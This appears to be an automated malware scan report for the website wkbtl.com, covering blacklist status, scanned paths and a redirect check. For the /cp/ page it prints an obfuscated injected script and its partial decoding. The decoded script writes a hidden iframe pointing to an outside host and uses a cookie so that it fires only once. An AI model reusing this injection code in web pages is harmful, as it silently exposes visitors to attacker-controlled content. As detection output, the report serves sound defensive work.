Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wkbtl.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wkbtl.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wkbtl.com/ | 200 OK Content-Length: 466 Content-Type: text/html | clean |
http://wkbtl.com/.ftpquota | 403 Forbidden Content-Length: 440 Content-Type: text/html | clean |
http://wkbtl.com/test404page.js | 404 Not Found Content-Length: 441 Content-Type: text/html | clean |
http://wkbtl.com/cgi-bin/ | 403 Forbidden Content-Length: 439 Content-Type: text/html | clean |
http://wkbtl.com/cp/ | 200 OK Content-Length: 17272 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame.
for(tabArc=0;tabArc<4;tabArc++){tabArc++};var gzOutS;for(loopS=0;loopS<2;loopS++){};gzOutS='%4e%4e%4e%45%44%48%4b%4d%02%56%59%4e%45%4c%03%12%77%4a%02%61%4f%54%13%1f%41%57%68%65%4c%70%6a%5a%00%07%17%1b%40%47%17%6a%70%0e%73%5e%45%0e%11%01%05%6b%5e%1d%56%52%42%50%74%68%04%13%11%1b%1b%23%4f%4e%66%56%4b%60%07%47%10%49%35%0c%0f%24%0b%6d%0c%19%09%1a%16%43%26%33%1b%7d%15%0e%00%1e%1a%3e%1c%31%4b%6f%16%43%6e%11%2c%55%53%55%72%4e%59%3b%5f%58%45%6d%5c%6b ...[3590 bytes skipped]...
Decoded script: ...[137 bytes skipped]... document.cookie.indexOf(this.doCont+'='+this.cowQD)==-1);},ccContPut:function(name, value){var d=new Date();d.setTime(new Date().getTime()+1800000); document.cookie=name+"="+escape(value)+";expires="+d.toGMTString(); },useUse:function(){return 'http://62foots.info/t/';},metaMid:function(){var jMax=document;if((new String(jMax.write)).indexOf('arity')>0) {return;}if(!this.opPut()) {try {outCp = "<div style='display:none'>";outCp+="<iframe ";outCp+="frameborder=0 ";outCp+="src='"+this.useUse();outCp+="'></iframe>";outCp+="</div>";jMax.open();jMax.write(outCp);jMax.close();outCp = null;} catch(e) {jMax.write("<html><body></body></html>");var vipRm=this;setTimeout(function(){ vipRm.metaMid() },1000);}this.ccContPut(this.doCont,this.cowQD);}}};this.aNatLs="aNatLs";var wilCc=new byteK(); var dGAs='';wilCc.metaMid();var beP=new Date(); function byteK(){};this.logAskEx='';byteK.proto ...[1171 bytes skipped]...
http://wkbtl.com/cp/scripts/index.html | 200 OK Content-Length: 497 Content-Type: text/html | clean |
http://wkbtl.com/namibia/ | 401 Unauthorized Content-Length: 50 Content-Type: text/html | clean |
http://wkbtl.com/prueba/ | 500 Internal Server Error Content-Length: 770 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wkbtl.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:40:43 GMT
Server: Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Length: 466
Content-Type: text/html;charset=ISO-8859-1
...466 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wkbtl.com
Referer: http://www.google.com/search?q=wkbtl.com
Result:
The result is similar to the first query. There are no suspicious redirects found.